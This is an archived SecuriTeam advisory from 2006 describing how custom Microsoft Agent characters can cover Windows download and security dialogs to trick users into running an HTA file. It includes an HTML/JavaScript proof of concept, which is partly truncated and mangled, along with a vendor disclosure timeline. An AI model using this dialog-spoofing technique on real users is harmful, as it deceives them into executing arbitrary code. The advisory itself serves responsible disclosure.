[NT] What A Click! (HTA, Microsoft Agent)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

  What A Click! (HTA, Microsoft Agent)


" <http://www.microsoft.com/msagent/prodinfo/datasheet.asp> Microsoft 
Agent is a technology that provides a foundation for more natural ways for 
people to communicate with their computers." By using custom Microsoft 
Agent characters it is possible to cover any kind of window appearing on 
the user's screen, including security or download dialogs.


Vulnerable Systems:
 * Windows 98
 * Windows 98 SE
 * Windows ME
 * Windows 2000
 * Windows XP
 * Windows 2003 Server

When using custom Microsoft Agent characters it is possible to cover any 
kind of windows, including security or download dialogs. This is an 
expected feature of the Microsoft Agent control. To quote the product 
homepage: " <http://www.microsoft.com/msagent/prodinfo/datasheet.asp> 
Animations are drawn on top of any underlying application window, 
characters are not bounded within their own, separate window". Custom 
characters can be created with tools download able from that homepage.

Because custom characters are fully script-able, can have any kind of 
shape and are downloaded automatically, this can be used as a flexible 
tool to cover and/or spoof any kind of window and lure the user to execute 
arbitrary code by performing one or two clicks (deepening on security zone 
configuration and Windows version).

< ! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"  >

< html>
< head>
        < title >Fireclicking   Proof-of-Concept< / title>
< / head>
< body onLoad="showGenie();">
< div style="font-family:Verdana;font-size:11px;">

< div 
 Proof-of-Concept< / div>
Designed for Internet Explorer 6 on Windows XP SP2 with classic theme
< br>< br>
< div style="width:600px">

< iframe src="about:blank" style="display:none" name="loadframe" 
id="loadframe">< / iframe>

< input type="button" onclick="loadframe.location='hta.hta'" value="click 
here first">

< OBJECT ID="Agent1" ClassID="clsid:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F" 
CodeBase="#VERSION=2,0,0,0">< / OBJECT>

< script language="JavaScript" type="text/javascript">
function showGenie() {
    var spoofWidth   = 500;
    var spoofHeight  = 380;
    var spoofScreenX = (screen.width/2)-(spoofWidth/2);
    var spoofScreenY = (screen.height/2)-(spoofHeight/2)+20;
    var path = 
    Agent1.Characters.Load("Character3", path+"/Character4.acf")
    Genie = Agent1.Characters("Character3")
    Genie.MoveTo(spoofScreenX, spoofScreenY)
    Genie.Get("state", "Showing")
    Genie.Get("animation", "anim1")
    Anim = Genie.Play("anim1")

< / script>

< br>< br>
< / div>
< / body>
< / html>

The PoC is designed for Internet Explorer 6 on Windows XP SP2 in Windows 
classic theme. By clicking on the button in the upper left corner you 
start the download of a HTA file. The download dialog gets covered by a 
Microsoft Agent character which fakes a button (basically a large white 
image with a button border in the middle). Move the character by dragging 
to see how it uses a "transparent spot" to make room for clicking on the 
underlying dialog through the button space. Transparent areas in 
characters are really "not there", meaning you can click through them.

When you click that button you execute arbitrary code in the HTA file, in 
this case you create the folder "c:\booom!". The button in the upper left 
corner is only need to get around the "drive by download" protection of 
Windows. When this protection is not in place (e.g. on Windows 2000) this 
PoC could be reduced to a single click interaction to execute arbitrary 

Disclosure Timeline:
2004-10-04 Vendor informed
2004-10-06 Vendor opened case, could not reproduce
2004-10-06 Vendor got new testcase
2004-10-12 Vendor confirmed bug
2005-06-14 Vendor released patch and advisory
2006-01-22 Public disclosure


The information has been provided by  <mailto:mikx@xxxxxxx> mikx.
The vendor advisory can be found at:  
The original proof of concept can be found at:  
<http://www.mikx.de/fireclicking/> http://www.mikx.de/fireclicking/


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx 


The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.